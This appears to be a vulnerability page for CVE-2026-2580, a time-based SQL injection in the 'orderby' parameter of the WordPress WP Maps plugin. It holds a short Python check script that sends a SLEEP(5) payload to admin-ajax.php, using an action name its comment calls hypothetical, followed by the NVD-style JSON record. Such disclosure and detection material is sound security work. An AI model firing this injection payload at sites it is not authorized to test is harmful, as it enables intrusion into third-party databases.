CVE-2026-2580

import requests def check_sqli(url): # The vulnerable endpoint varies, usually admin-ajax.php or a specific shortcode route target = f"{url}/wp-admin/admin-ajax.php" # Payload for Time-Based Blind SQL Injection # This payload attempts to cause a 5-second delay payload = "1 AND (SELECT * FROM (SELECT(SLEEP(5)))a)" params = { "action": "wpgmp_sort_locations", # Hypothetical action based on plugin structure "orderby": payload } try: r = requests.get(target, params=params, timeout=10) if r.elapsed.total_seconds() >= 5: print("[!] Vulnerability confirmed: Response time delayed.") else: print("[-] Not vulnerable or incorrect endpoint.") except Exception as e: print(f"[Error] {e}") # Usage # check_sqli("http://target-wordpress-site.com")

{"cve": {"id": "CVE-2026-2580", "sourceIdentifier": "[email protected]", "published": "2026-03-23T00:16:51.453", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to time-based SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 4.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}, {"lang": "es", "value": "El plugin WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters para WordPress es vulnerable a inyección SQL basada en tiempo a través del parámetro 'orderby' en todas las versiones hasta la 4.9.1, inclusive, debido a un escape insuficiente en el parámetro proporcionado por el usuario y la falta de preparación suficiente en la consulta SQL existente. Esto permite a atacantes no autenticados añadir consultas SQL adicionales a consultas ya existentes que pueden utilizarse para extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-google-map-plugin/tags/4.9.1/classes/wpgmp-helper.php#L127", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-google-map-plugin/tags/4.9.1/core/class.tabular.php#L780", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-google-map-plugin/tags/4.9.1/wp-google-map-plugin.php#L77", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8d954868-eff2-497d-84e7-cc42da8a4c6f?source=cve", "source": "[email protected]"}]}}